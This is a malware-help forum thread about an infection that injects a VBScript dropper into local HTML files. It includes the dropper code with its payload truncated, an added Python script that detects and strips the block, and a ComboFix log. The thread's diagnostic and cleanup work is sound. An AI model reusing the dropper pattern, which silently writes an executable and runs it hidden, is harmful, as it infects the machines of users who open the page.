
svchost.exe script injection into local html files


This topic is locked
25 replies to this topic

#1 mikethecow
Posted 28 July 2010 - 08:52 AM

Hi

I am unsure what is infecting my computer but it is adding the following script to all local html files whenever the computer restarts:

[codebox]
<script Language=VBScript><!--
' Name of the file the dropper writes out
DropFileName = "svchost.exe"
' Hex-encoded executable (truncated in this post); 4D5A is the "MZ" DOS header
WriteData = "4D5A...00"
Set FSO = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(2) is the user's temp folder
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
' Decode two hex characters per byte and write them out
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
' Run the dropped file with a hidden window (window style 0)
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
[/codebox]

I have run DDS and attached the log but I can only run GMER in safe mode; running normally I get a BSOD of 'bad pool header' type as soon as GMER starts running.

Sorry this is vague; I have run MalwareBytes, Super AntiSpyware, SpyBot Search & Destroy, Advanced System Protector and A Squared Free.

They all locate stuff which reappears every time the computer restarts. I ran all these programs after disconnecting from the internet.

Thanks in advance and I would really appreciate any light you could shed on this - I haven't been able to find anything through Google of this issue.

All the best

Mike
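As an added example (not code from the thread or from any of the tools named in it), here is a Python triage script that finds the injected block described above in local HTML files, decodes the WriteData hex far enough to confirm the dropped file would be a PE (4D5A is the "MZ" DOS header), hashes the payload for sharing, and strips the block. The marker strings it matches on are taken from the script quoted in the post; the sample HTML and its short hex payload are constructed.

```python
"""Find, triage and strip the VBScript dropper injected into local HTML files."""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Optional

# One regex for the whole injected block as quoted in the post: the VBScript
# opener, the DropFileName and WriteData assignments, and the closing
# '//--></SCRIPT>'. Non-greedy so unrelated <script> blocks are not swallowed.
INJECT_RE = re.compile(
    r"<script\s+language\s*=\s*\"?vbscript\"?\s*>\s*<!--"
    r".*?DropFileName\s*=\s*\"(?P<drop>[^\"]*)\""
    r".*?WriteData\s*=\s*\"(?P<data>[^\"]*)\""
    r".*?//-->\s*</script>",
    re.IGNORECASE | re.DOTALL,
)


@dataclass
class Finding:
    drop_name: str          # file name the dropper writes into the temp folder
    payload_len: int        # decoded payload size in bytes (0 if not decodable)
    payload_sha256: str     # hash of the decoded payload, for triage/IOC sharing
    is_pe: bool             # decoded bytes start with the 'MZ' DOS header
    span: tuple[int, int]   # offsets of the injected block inside the HTML


def decode_payload(hexdata: str) -> bytes:
    """WriteData is a hex string, two characters per byte (as the For loop shows)."""
    try:
        return bytes.fromhex(hexdata)
    except ValueError:       # odd length or non-hex characters: not decodable
        return b""


def find_injection(html: str) -> Optional[Finding]:
    """Locate the injected dropper in one HTML document, or None if clean."""
    m = INJECT_RE.search(html)
    if m is None:
        return None
    payload = decode_payload(m.group("data"))
    return Finding(
        drop_name=m.group("drop"),
        payload_len=len(payload),
        payload_sha256=hashlib.sha256(payload).hexdigest(),
        is_pe=payload[:2] == b"MZ",
        span=(m.start(), m.end()),
    )


def strip_injection(html: str) -> str:
    """Return the document with every injected block removed (idempotent)."""
    return INJECT_RE.sub("", html)


def scan_tree(root: Path, clean: bool = False) -> list[tuple[Path, Finding]]:
    """Walk a folder of local .htm/.html files and report (optionally clean) hits."""
    hits: list[tuple[Path, Finding]] = []
    for path in root.rglob("*"):
        if path.suffix.lower() not in (".htm", ".html"):
            continue
        html = path.read_text(encoding="utf-8", errors="replace")
        finding = find_injection(html)
        if finding is None:
            continue
        hits.append((path, finding))
        if clean:
            path.write_text(strip_injection(html), encoding="utf-8")
    return hits


# Constructed sample: a benign page with the dropper appended, as the post
# describes. The hex is only the first eight bytes of a PE header, not a binary.
SAMPLE_HTML = (
    "<html><body><p>hello</p></body></html>\n"
    "<script Language=VBScript><!--\n"
    'DropFileName = "svchost.exe"\n'
    'WriteData = "4D5A900003000000"\n'
    'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
    'DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName\n'
    'Set WSHshell = CreateObject("WScript.Shell")\n'
    "WSHshell.Run DropPath, 0\n"
    "//--></SCRIPT>"
)

if __name__ == "__main__":
    print(find_injection(SAMPLE_HTML))
    print(repr(strip_injection(SAMPLE_HTML)))
```

Cleaning the files only sticks once the running dropper and its persistence are gone; as the post notes, the script reappears at every restart while the infection is active.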

#2 m0le
  • Malware Response Team
  • Location:London, UK
Posted 07 August 2010 - 12:55 AM

Hi,

Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.
  • Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

  • Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

  • Please reply to this post so I know you are there.
The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks

m0le is a proud member of UNITE

#3 mikethecow
Posted 07 August 2010 - 10:48 AM

Hi m0le!

Many thanks for getting back to me and I appreciate how busy you all are and that you are doing this for purely altruistic reasons ;)

I have been good, not posted to any other forums, waiting patiently for you good people to get back to me.

I am around so soon as you let me know what to do I can crack on with it.

Thanks again

Mike

#4 m0le
Posted 07 August 2010 - 05:07 PM

Hi,

I'm not a programmer so I can't read the code. I believe we can deal with this without knowing what the code is, if not I will take advice.

Please download ComboFix from one of these locations:
* IMPORTANT !!! Save ComboFix.exe to your Desktop making sure you rename it comfix.exe
  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Double click on Comfix.exe & follow the prompts.
  • As part of its process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware.
  • Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console.
**Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue its malware removal procedures.

Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message:

Click on Yes, to continue scanning for malware.

When finished, it shall produce a log for you. Please include the C:\ComboFix.txt in your next reply.

m0le is a proud member of UNITE

#5 mikethecow

Posted 07 August 2010 - 05:27 PM

Hi m0le

Will go the ComboFix route now.

A few things though:
  • In the weeks before posting to this forum I did run ComboFix - whether or not this was a good idea.
  • Anti Spyware progs said I had Ramnit, Rootkits... sorry, never kept the logs so can't be any more specific.
  • Either my botched removal attempts or the malware has caused:
  1. Firefox to stop working - just get 'untitled' tabs
  2. All Adobe CS2 apps to stop working
  3. Zip / file compression programs to disappear
  4. All .html files to become inaccessible - if I rename them to '.html.php' I can open them and the malicious script is still intact (after I used software to remove it)

Don't know if that helps at all - in the interests of full disclosure ;)

Thanks

Mike

#6 mikethecow

Posted 07 August 2010 - 06:00 PM

Hi M0le

Here's the ComboFix log:

[codebox]ComboFix 10-08-07.01 - Mike 07/08/2010 23:42:57.5.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.2.1252.44.1033.18.1015.553 [GMT 1:00]
Running from: e:\documents and settings\Mike\Desktop\ComFix.exe
FW: COMODO Firewall *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

e:\program files\Internet Explorer\complete.dat
e:\program files\Internet Explorer\dmlconf.dat
e:\program files\Microsoft\DesktopLayer.exe
e:\windows\system32\1.tmp

.
((((((((((((((((((((((((( Files Created from 2010-07-07 to 2010-08-07 )))))))))))))))))))))))))))))))
.

2010-08-01 11:06 . 2010-08-01 11:07 -------- d-----w- e:\documents and settings\Admin\Application Data\PSpad
2010-08-01 10:34 . 2010-08-01 10:34 -------- d--h--w- e:\windows\PIF
2010-07-30 06:46 . 2010-08-07 22:32 46080 ----a-w- e:\windows\ExplorerSrv.exe
2010-07-29 21:11 . 2010-07-29 21:11 -------- d-----w- e:\documents and settings\Admin\Application Data\Malwarebytes
2010-07-29 20:38 . 2010-07-29 20:38 -------- d-----w- e:\documents and settings\Admin\Application Data\Systweak
2010-07-29 09:11 . 2010-02-05 08:17 233136 ----a-w- e:\windows\system32\drivers\pctgntdi.sys
2010-07-29 09:10 . 2010-03-29 09:06 218592 ----a-w- e:\windows\system32\drivers\PCTCore.sys
2010-07-29 09:10 . 2009-11-23 12:54 88040 ----a-w- e:\windows\system32\drivers\PCTAppEvent.sys
2010-07-29 09:09 . 2010-08-07 22:33 -------- d-----w- e:\program files\Spyware Doctor
2010-07-29 09:09 . 2010-08-07 22:33 -------- d-----w- e:\program files\Common Files\PC Tools
2010-07-29 09:03 . 2010-07-29 21:37 -------- d-----w- e:\documents and settings\Admin\Microsoft
2010-07-28 20:16 . 2010-07-28 20:18 63488 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\SD10006.dll
2010-07-28 20:16 . 2010-07-28 20:18 117760 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\UIREPAIR.DLL
2010-07-28 20:16 . 2010-07-28 20:16 52224 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\SD10005.dll
2010-07-28 20:12 . 2010-07-28 20:12 -------- d-----w- E:\VritualRoot
2010-07-28 20:11 . 2010-07-28 20:12 -------- d-----w- e:\documents and settings\All Users\Application Data\COMODO
2010-07-28 20:09 . 2010-07-28 20:09 -------- d-----w- e:\program files\COMODO
2010-07-28 20:02 . 2010-07-28 20:08 -------- d-----w- e:\documents and settings\All Users\Application Data\Comodo Downloader
2010-07-28 14:35 . 2010-07-28 14:35 -------- d-----w- e:\program files\ESET
2010-07-22 11:16 . 2010-07-22 11:16 -------- d-----w- E:\modules
2010-07-21 20:53 . 2010-07-28 17:25 -------- d-----w- e:\program files\riva
2010-07-21 20:52 . 2010-08-07 22:48 -------- d-----w- e:\program files\Microsoft
2010-07-15 21:04 . 2010-07-16 08:08 120 ----a-w- e:\documents and settings\Erin\Local Settings\Application Data\Szuyoc.dat
2010-07-15 21:04 . 2010-07-16 08:08 0 ----a-w- e:\documents and settings\Erin\Local Settings\Application Data\Oyavogikewejog.bin
2010-07-13 21:26 . 2010-07-23 13:38 0 ----a-w- e:\windows\Oyavogikewejog.bin
2010-07-13 21:26 . 2010-07-23 13:38 120 ----a-w- e:\windows\Szuyoc.dat

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-08-07 22:33 . 2010-06-15 10:25 -------- d---a-w- e:\documents and settings\All Users\Application Data\TEMP
2010-08-07 12:58 . 2010-02-06 23:45 -------- d-----w- e:\documents and settings\Mike\Application Data\vlc
2010-08-01 10:53 . 2010-02-01 22:06 23928 ----a-w- e:\documents and settings\Admin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-07-31 10:57 . 2010-02-02 09:06 -------- d-----w- e:\program files\Common Files\Adobe
2010-07-29 21:11 . 2010-05-04 20:03 -------- d-----w- e:\program files\Malwarebytes' Anti-Malware
2010-07-29 09:59 . 2010-07-29 10:06 6144 ------w- e:\windows\system32\2.tmp
2010-07-28 20:49 . 2010-05-04 20:10 -------- d-----w- e:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2010-07-28 17:24 . 2010-02-01 23:35 -------- d-----w- e:\program files\Opera
2010-07-28 15:18 . 2010-02-02 11:34 -------- d-----w- e:\program files\ZipGenius 6
2010-07-28 15:17 . 2010-06-10 12:27 -------- d-----w- e:\program files\SUPERAntiSpyware
2010-07-28 15:14 . 2010-02-01 23:55 -------- d-----w- e:\program files\QuickTime
2010-07-28 15:14 . 2010-02-02 10:19 -------- d-----w- e:\program files\PSPad editor
2010-07-28 15:14 . 2010-04-20 10:17 -------- d-----w- e:\program files\PC Connectivity Solution
2010-07-28 15:12 . 2010-05-13 09:34 -------- d-----w- e:\program files\Duplicate Cleaner
2010-07-28 15:11 . 2010-02-02 00:58 -------- d-----w- e:\program files\DAEMON Tools Lite
2010-07-28 15:11 . 2010-02-27 07:31 -------- d-----w- e:\program files\Common Files\DivX Shared
2010-07-28 15:09 . 2010-06-11 16:33 -------- d-----w- e:\program files\CCleaner
2010-07-28 15:09 . 2010-04-29 16:29 -------- d-----w- e:\program files\Audacity
2010-07-28 15:00 . 2010-06-13 16:14 -------- d-----w- e:\program files\a-squared HiJackFree
2010-07-28 14:59 . 2010-02-02 11:34 -------- d-----w- e:\program files\7-Zip
2010-07-26 09:40 . 2010-02-01 23:17 -------- d-----w- e:\program files\BitDefender
2010-07-26 09:33 . 2010-02-01 23:25 81984 ----a-w- e:\windows\system32\bdod.bin
2010-07-24 12:56 . 2010-02-11 13:14 -------- d-----w- e:\documents and settings\Mike\Application Data\uTorrent
2010-07-24 11:27 . 2010-02-02 10:57 -------- d-----w- e:\documents and settings\Mike\Application Data\FileZilla
2010-07-23 20:37 . 2010-06-13 16:14 -------- d-----w- e:\program files\a-squared Free
2010-07-23 17:37 . 2010-03-19 12:17 -------- d-----w- e:\documents and settings\Mike\Application Data\Aczy
2010-07-23 16:23 . 2010-04-25 07:45 -------- d-----w- e:\documents and settings\Mike\Application Data\Nuunn
2010-07-11 09:22 . 2010-05-29 15:34 -------- d-----w- e:\documents and settings\Erin\Application Data\vlc
2010-07-09 20:48 . 2010-04-06 23:07 -------- d-----w- e:\documents and settings\Erin\Application Data\uTorrent
2010-07-05 20:05 . 2010-02-02 09:36 23928 ----a-w- e:\documents and settings\Mike\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-06-26 13:39 . 2010-06-26 13:39 -------- d-----w- e:\documents and settings\Erin\Application Data\Systweak
2010-06-15 16:48 . 2010-06-15 16:44 43488992 ----a-w- e:\documents and settings\All Users\Application Data\Systweak\Advanced System Protector\Antispyware_Setup_6_15_2010.exe
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\documents and settings\Mike\Application Data\Systweak
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\documents and settings\All Users\Application Data\Systweak
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\program files\Systweak
2010-06-15 11:43 . 2010-06-09 09:34 -------- d-----w- e:\program files\Common Files\Little Registry Cleaner
2010-06-15 11:43 . 2010-06-09 09:32 -------- d-----w- e:\program files\Little Registry Cleaner
2010-06-15 11:42 . 2010-06-15 10:59 -------- d-----w- e:\program files\Win 32.Trojan Downloader.Murlo Removal Tool
2010-06-15 09:29 . 2010-06-15 09:29 -------- dc-h--w- e:\documents and settings\All Users\Application Data\{74D08EB8-01D1-4BAE-91E3-F30C1B031AC6}
2010-06-13 16:13 . 2010-06-13 16:13 388096 ----a-r- e:\documents and settings\Mike\Application Data\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-06-13 16:13 . 2010-06-13 16:13 -------- d-----w- e:\program files\Trend Micro
2010-06-12 14:36 . 2010-06-12 14:36 -------- d-----w- e:\program files\Sophos
2010-06-12 01:31 . 2010-06-11 22:52 -------- d-----w- e:\program files\Windows Live Safety Center
2010-06-10 12:28 . 2010-06-10 12:28 -------- d-----w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com
2010-06-10 12:28 . 2010-06-10 12:28 -------- d-----w- e:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2010-06-10 11:03 . 2010-02-01 19:40 77423 ----a-w- e:\windows\pchealth\helpctr\OfflineCache\index.dat
2010-06-04 10:55 . 2010-06-04 10:55 229312 ----a-w- e:\windows\system32\drivers\cmdGuard.sys
2010-06-01 18:00 . 2010-06-01 18:00 278288 ----a-w- e:\windows\system32\guard32.dll
2010-06-01 18:00 . 2010-06-01 18:00 87824 ----a-w- e:\windows\system32\drivers\inspect.sys
2010-06-01 18:00 . 2010-06-01 18:00 25240 ----a-w- e:\windows\system32\drivers\cmdhlp.sys
2010-06-01 18:00 . 2010-06-01 18:00 15464 ----a-w- e:\windows\system32\drivers\cmderd.sys
2010-06-01 15:47 . 2010-04-08 08:19 19616 ----a-w- e:\documents and settings\Erin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-05-19 09:51 . 2010-05-19 09:51 4 ----a-w- e:\windows\system32\config\systemprofile\Application Data\ofubwi.dat
2010-05-17 14:20 . 2010-05-17 14:20 4 ----a-w- e:\documents and settings\Mike\Application Data\ofubwi.dat
.

((((((((((((((((((((((((((((( SnapShot@2010-07-26_13.35.37 )))))))))))))))))))))))))))))))))))))))))
.
- 2010-02-01 20:18 . 2010-07-24 07:54 32768 e:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
+ 2010-02-01 20:18 . 2010-07-28 20:11 32768 e:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
- 2010-02-01 20:18 . 2010-07-24 07:54 32768 e:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
+ 2010-02-01 20:18 . 2010-07-28 20:11 32768 e:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2010-02-01 20:18 . 2010-07-24 07:54 16384 e:\windows\system32\config\systemprofile\Cookies\index.dat
+ 2010-07-28 13:10 . 2010-07-28 20:11 16384 e:\windows\system32\config\systemprofile\Cookies\index.dat
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Distiller.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Distiller.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat_Standard.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat_Standard.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 65536 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\PM_Designer.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 65536 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\PM_Designer.exe
+ 2009-12-21 19:09 . 2009-12-21 19:09 16832 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\ViewerPS.dll
+ 2009-12-22 00:57 . 2009-12-22 00:57 35760 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\reader_sl.exe
+ 2009-12-21 19:02 . 2009-12-21 19:02 79280 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\PDFPrevHndlr.dll
+ 2009-12-21 22:21 . 2009-12-21 22:21 99776 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\eula.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 70584 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\adobeextractfiles.dll
+ 2009-12-21 22:37 . 2009-12-21 22:37 27048 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrotextextractor.exe
+ 2009-12-21 17:39 . 2009-12-21 17:39 15288 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32Info.exe
+ 2009-12-21 17:27 . 2009-12-21 17:27 75200 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acroiehelpershim.dll
+ 2009-12-21 17:27 . 2009-12-21 17:27 61888 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroIEHelper.dll
+ 2010-02-02 09:13 . 2010-07-28 16:59 7278 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_ELEMENTS_DT.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 7278 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_ELEMENTS_DT.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 326056 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\readerupdater.exe
+ 2009-12-21 17:35 . 2009-12-21 17:35 378264 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\pdfshell.dll
+ 2009-12-21 19:05 . 2009-12-21 19:05 116168 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\PDFPrevHndlrShim.exe
+ 2009-12-21 17:34 . 2009-12-21 17:34 103864 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\nppdf32.dll
+ 2009-11-09 18:18 . 2009-11-09 18:18 684032 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\JP2KLib.dll
+ 2009-12-21 19:02 . 2009-12-21 19:02 542168 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AdobeCollabSync.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 948672 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\adobearm.exe
+ 2009-12-21 17:43 . 2009-12-21 17:43 120240 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRdIF.dll
+ 2009-12-22 00:57 . 2009-12-22 00:57 349616 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32.exe
+ 2009-12-21 17:15 . 2009-12-21 17:15 660912 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroPDF.dll
+ 2009-12-21 18:32 . 2009-12-21 18:32 280024 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrobroker.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 326056 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrobatupdater.exe
+ 2009-12-21 18:15 . 2009-12-21 18:15 251296 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\a3dutility.exe
+ 2004-06-01 09:36 . 2004-06-01 09:36 214512 e:\windows\Installer\$PatchCache$\Managed\68AB67CA330100007706000000000020\7.0.0\icudt26l.dat
+ 2010-06-20 08:01 . 2010-06-20 08:01 8040960 e:\windows\Installer\90f09a.msp
+ 2010-07-31 10:58 . 2010-07-31 10:58 3940352 e:\windows\Installer\90f099.msi
+ 2010-07-28 16:26 . 2010-07-28 16:26 2647552 e:\windows\Installer\8f997b.msi
+ 2010-07-28 20:10 . 2010-07-28 20:10 3648000 e:\windows\Installer\571b0.msi
+ 2009-12-21 17:29 . 2009-12-21 17:29 2409880 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\rt3d.dll
+ 2009-12-21 18:00 . 2009-12-21 18:00 1298996 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\JSByteCodeWin.bin
+ 2009-12-21 22:31 . 2009-12-21 22:31 5713920 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AGM.dll
+ 2010-04-04 06:54 . 2010-04-04 06:54 11850240 e:\windows\Installer\90f09b.msp
+ 2009-12-21 22:21 . 2009-12-21 22:21 20436408 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"COMODO Internet Security"="e:\program files\COMODO\COMODO Internet Security\cfp.exe" [2010-06-01 2039240]
"Adobe Reader Speed Launcher"="e:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-06-20 35760]
"Adobe ARM"="e:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-06-09 976832]
"Advanced System Protector"="e:\program files\Systweak\Advanced System Protector\ASP.exe" [2009-11-03 16347368]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="e:\windows\system32\CTFMON.EXE" [2004-08-04 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- e:\program files\SUPERAntiSpyware\SASWINLO.DLL

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=e:\windows\system32\guard32.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0sasnative32

[HKLM\~\startupfolder\E:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Acrobat Speed Launcher.lnk]
path=e:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Acrobat Speed Launcher.lnk
backup=e:\windows\pss\Adobe Acrobat Speed Launcher.lnkCommon Startup

[HKLM\~\startupfolder\E:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Gamma.lnk]
path=e:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Gamma.lnk
backup=e:\windows\pss\Adobe Gamma.lnkCommon Startup

[HKLM\~\startupfolder\E:^Documents and Settings^Mike^Start Menu^Programs^Startup^sisytj32.exe]
path=e:\documents and settings\Mike\Start Menu\Programs\Startup\sisytj32.exe
backup=e:\windows\pss\sisytj32.exeStartup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KernelFaultCheck]
e:\windows\system32\dumprep 0 -k [X]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Advanced System Protector]
2009-11-03 18:35 16347368 ----a-w- e:\program files\Systweak\Advanced System Protector\ASP.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AutoStartNPSAgent]
2009-08-14 14:48 106904 ----a-w- e:\program files\Samsung\Samsung New PC Studio\NPSAgent.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Broadcom Wireless Manager UI]
2006-11-01 12:48 1392640 ----a-w- e:\windows\system32\WLTRAY.EXE

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CTFMON.EXE]
2004-08-04 10:00 15360 ----a-w- e:\windows\system32\ctfmon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxhkcmd]
2006-06-06 17:06 77824 ----a-w- e:\windows\system32\hkcmd.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxpers]
2006-06-06 17:10 118784 ----a-w- e:\windows\system32\igfxpers.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxtray]
2006-06-06 17:09 94208 ----a-w- e:\windows\system32\igfxtray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2010-01-22 19:16 141608 ----a-w- e:\program files\iTunes\iTunesHelper.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Malwarebytes Anti-Malware (rootkit-scan)]
2010-04-29 14:39 1090952 ----a-w- e:\program files\Malwarebytes' Anti-Malware\mbam.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2004-08-04 01:06 1667584 ----a-w- e:\program files\Messenger\msmsgs.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SDFix]
2008-11-05 23:58 964661 ----a-w- e:\sdfix\RunThis.bat

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SigmatelSysTrayApp]
2007-05-10 10:22 405504 ----a-w- e:\program files\SigmaTel\C-Major Audio\WDM\stsystra.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2010-05-18 17:26 2397424 ----a-w- e:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2006-03-08 12:48 761947 ----a-w- e:\program files\Synaptics\SynTP\SynTPEnh.exe

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"ISTray"="e:\program files\Spyware Doctor\pctsTray.exe"

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

